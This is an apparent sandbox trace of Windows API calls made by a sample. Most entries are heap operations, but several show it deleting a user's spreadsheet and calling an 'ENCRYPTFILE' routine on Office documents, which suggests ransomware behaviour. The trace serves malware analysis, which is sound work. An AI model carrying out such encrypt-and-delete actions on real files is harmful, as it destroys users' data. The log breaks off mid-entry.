1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.086] FreeLibrary (hLibModule=0x756e0000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.086] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0077.087] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.087] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.087] CloseHandle (hObject=0x298) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.088] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.088] CloseHandle (hObject=0x258) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb3b0 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.091] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0077.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49cff98 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.114] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx", lpFilePart=0x0) returned 0x24 [0077.114] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\mnsju.xlsx")) returned 0x20 [0077.114] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e6e2450, ftCreationTime.dwHighDateTime=0x1d56c16, ftLastAccessTime.dwLowDateTime=0x39fc4f70, ftLastAccessTime.dwHighDateTime=0x1d56b9a, ftLastWriteTime.dwLowDateTime=0x39fc4f70, ftLastWriteTime.dwHighDateTime=0x1d56b9a, nFileSizeHigh=0x0, nFileSizeLow=0x11fc2, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="mnsjU.xlsx", cAlternateFileName="MNSJU~1.XLS")) returned 0x41ac780 [0077.115] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\mnsju.xlsx")) returned 1 [0077.118] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e6e2450, ftCreationTime.dwHighDateTime=0x1d56c16, ftLastAccessTime.dwLowDateTime=0x39fc4f70, ftLastAccessTime.dwHighDateTime=0x1d56b9a, ftLastWriteTime.dwLowDateTime=0x39fc4f70, ftLastWriteTime.dwHighDateTime=0x1d56b9a, nFileSizeHigh=0x0, nFileSizeLow=0x11fc2, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="mnsjU.xlsx", cAlternateFileName="MNSJU~1.XLS")) returned 0 [0077.118] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.119] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ef0 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0077.119] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0077.120] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.120] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\nDdxnatd.pptx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39980a90, ftCreationTime.dwHighDateTime=0x1d5d762, ftLastAccessTime.dwLowDateTime=0x4e494740, ftLastAccessTime.dwHighDateTime=0x1d5d0de, ftLastWriteTime.dwLowDateTime=0x4e494740, ftLastWriteTime.dwHighDateTime=0x1d5d0de, nFileSizeHigh=0x0, nFileSizeLow=0x15fcc, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="nDdxnatd.pptx", cAlternateFileName="NDDXNA~1.PPT")) returned 0x41ac040 [0077.120] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0077.120] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.120] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0077.121] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.121] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d70 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0077.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0077.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.124] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0077.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.124] RtlAllocateHeap 